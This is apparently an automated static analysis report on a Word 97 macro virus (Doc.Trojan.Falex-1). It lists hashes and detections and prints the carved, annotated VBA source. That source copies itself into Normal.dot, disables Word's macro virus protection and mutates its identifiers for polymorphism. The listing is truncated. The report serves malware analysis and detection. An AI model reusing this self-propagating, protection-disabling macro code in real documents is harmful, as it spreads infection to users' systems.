Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35c8c9118ded6f39…

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-02-05 21:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 03575f65cf3186f27e134bcc342955f1 SHA-1: f33db6681502b4a96eea0663356b684fc4f5f7ad SHA-256: 35c8c9118ded6f39a81ade66af93dc2be1f0d630e4b514db18f5dc999c2843f7
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word 97 document containing malicious VBA macros. The Document_Close handler copies the document's own module code into the Normal.dot template (and, conversely, copies code from an already infected template into the open document), indicating a likely attempt at persistence or propagation; it also sets Options.VirusProtection to False, disabling Word's built-in macro warning. The ClamAV detection 'Doc.Trojan.Falex-1' further supports the malicious nature of the file.

Heuristics 2

  • ClamAV: Doc.Trojan.Falex-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Falex-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18744 bytes
SHA-256: 4e64e814976ca8e110d55a677ee5180e8bd0186b2ca1a2ffe7565dd564e15cb3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header of the carved macro. VB_Name/VB_Base identify this as the
' document's ThisDocument class module, and VB_TemplateDerived = True records that the
' document was created from a template (consistent with the Normal-template copy logic below).
' Analyst note: auto-executing event handler. Word runs Document_Close when the document
' is closed, so this is the macro's entry point (MITRE T1059.005). It copies code between
' the active document's first VB component and the Normal template's first VB component,
' in whichever direction is currently "uninfected".
Private Sub Document_Close()

' Suppress all runtime errors (e.g. VBProject access denied, template locked) so the
' routine fails silently instead of raising a visible error.
On Error Resume Next

' Aliases for True/False/0/1/":" and the two Word save-format constants. These names
' are listed in PolyIt's Variable() table (Variable(PolyItVarCount + 16) onward), so the
' aliasing appears to exist to give the renaming routine more identifiers to mutate.
Const Truex = True, Falsex = False, Zero = 0, One = 1, wdFormatDocumentx = wdFormatDocument, wdFormatTemplatex = wdFormatTemplate, DoubleDot = ":"

' Note: in VBA a shared "As" clause only types the last name on the line; the earlier
' names on each Dim are Variant.
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim activedoc, normaltmp As Object
Dim ActiveDocName, OurCode As String

' First VB component of the open document and of the Normal template
' (presumably the ThisDocument module in each — confirm against the project layout).
' Access to VBProject requires Word's "Trust access to the VBA project object model"
' setting; with it disabled these assignments fail and are swallowed by On Error Resume Next.
Set activedoc = ActiveDocument.VBProject.VBComponents.Item(One)
Set normaltmp = NormalTemplate.VBProject.VBComponents.Item(One)


DocumentInfected = Falsex
NormalTemplateInfected = Falsex

' A component is treated as "infected" simply if its code module contains any lines.
If activedoc.CodeModule.CountOfLines <> Zero Then DocumentInfected = Truex
If normaltmp.CodeModule.CountOfLines <> Zero Then NormalTemplateInfected = Truex

' Turns off Word's macro virus protection prompt. Detection-relevant: legitimate
' document macros have no reason to change this option.
Options.VirusProtection = Falsex

' Proceed only when exactly one side carries code (Xor) and the document is saved as a
' .doc or .dot (the formats whose files can hold a VBA project).
If (DocumentInfected = Truex Xor NormalTemplateInfected = Truex) And (ActiveDocument.SaveFormat = wdFormatDocumentx Or ActiveDocument.SaveFormat = wdFormatTemplatex) Then
   
  ' Direction 1: document -> Normal template.
  If DocumentInfected = Truex Then
  
    ' Remember whether the template had unsaved changes before we touch it.
    SaveNormalTemplate = NormalTemplate.Saved
  
    ' Read the entire code module of the active document into a string.
    OurCode = activedoc.CodeModule.Lines(One, activedoc.CodeModule.CountOfLines)
    
    ' AppendLog is not in this excerpt (name appears in PolyIt's identifier table).
    ' PolyIt takes OurCode ByRef and rewrites identifiers before the copy is inserted,
    ' so each template infection carries a differently-named variant.
    Call AppendLog(OurCode)
    Call PolyIt(OurCode)

    ' Insert the (mutated) code at line 1 of the template's module.
    normaltmp.CodeModule.InsertLines One, OurCode
    
    ' Write Normal.dot to disk only if it was previously in a saved state, so no
    ' "save changes to template?" prompt is triggered on exit.
    If SaveNormalTemplate = Truex Then NormalTemplate.Save
    
  End If


  ' Second character of the document's full path; "x:" means the document has a
  ' drive-letter path, i.e. it exists on disk.
  ActiveDocName = Mid(ActiveDocument.FullName, 2, One)
  ' Direction 2: Normal template -> document, when the template carries code and the
  ' document is either on disk or has unsaved changes.
  If NormalTemplateInfected = Truex And (ActiveDocName = DoubleDot Or ActiveDocument.Saved = Falsex) Then
  
    SaveDocument = ActiveDocument.Saved
    
    ' Copied verbatim here (no PolyIt/AppendLog call on this path).
    OurCode = normaltmp.CodeModule.Lines(1, normaltmp.CodeModule.CountOfLines)
    
    activedoc.CodeModule.InsertLines One, OurCode
    
    ' As above: persist only if the document was already in a saved state.
    If SaveDocument = Truex Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub


Private Sub PolyIt(ByRef OurCode As String)

On Error Resume Next

Const PolyItVarCount = 16, VarCount = PolyItVarCount + 23, UpperLimit = 15, LowerLimit = 5, AsciiA = 65, AsciiZ = 90, One = 1

Dim Variable(One To VarCount), Variable2(One To VarCount), NewCode As String
Dim CounterI, CounterJ, CounterK As Integer
Dim Changed As Boolean

Variable(1) = "OurCode"
Variable(2) = "VarCount"
Variable(3) = "Variable"
Variable(4) = "Variable2"
Variable(5) = "NewCode"
Variable(6) = "CounterI"
Variable(7) = "CounterJ"
Variable(8) = "CounterK"
Variable(9) = "Changed"
Variable(10) = "PolyIt"
Variable(11) = "PolyItVarCount"
Variable(12) = "UpperLimit"
Variable(13) = "LowerLimit"
Variable(14) = "AsciiA"
Variable(15) = "AsciiZ"
Variable(16) = "One"

Variable(PolyItVarCount + 1) = "SaveDocument"
Variable(PolyItVarCount + 2) = "SaveNormalTemplate"
Variable(PolyItVarCount + 3) = "DocumentInfected"
Variable(PolyItVarCount + 4) = "NormalTemplateInfected"
Variable(PolyItVarCount + 5) = "activedoc"
Variable(PolyItVarCount + 6) = "normaltmp"
Variable(PolyItVarCount + 7) = "AppendLog"
Variable(PolyItVarCount + 8) = "UserAddy"
Variable(PolyItVarCount + 9) = "Chr13"
Variable(PolyItVarCount + 10) = "Chr10"
Variable(PolyItVarCount + 11) = "Comment"
Variable(PolyItVarCount + 12) = "UserAddyTmp"
Variable(PolyItVarCount + 13) = "UserNameTmp"
Variable(PolyItVarCount + 14) = "TimeDate"
Variable(PolyItVarCount + 15) = "ActiveDocName"
Variable(PolyItVarCount + 16) = "Truex"
Variable(PolyItVarCount + 17) = "Falsex"
Variable(PolyItVarCount + 18) = "Zero"
Variable(PolyItVarCount + 19) = "wdFormatDocumentx"
Variable(PolyItVarCount + 20) = "wdFormatTemplatex"
Variable(PolyItVarCount + 21) = "TimeFormat"
Variable(PolyItVarCount + 22) = "DateFormat"
Variable(PolyItVarCount + 23) = "DoubleDot"

Randomize

For CounterI = One To VarCount
  For CounterJ = One To Int((UpperLimit - LowerLimit + One) * Rnd + LowerLimit)
    Variable2(CounterI) = Variable2(CounterI) & Chr(Int((AsciiZ - AsciiA + 1) * Rnd + AsciiA))
  Next CounterJ

... (truncated)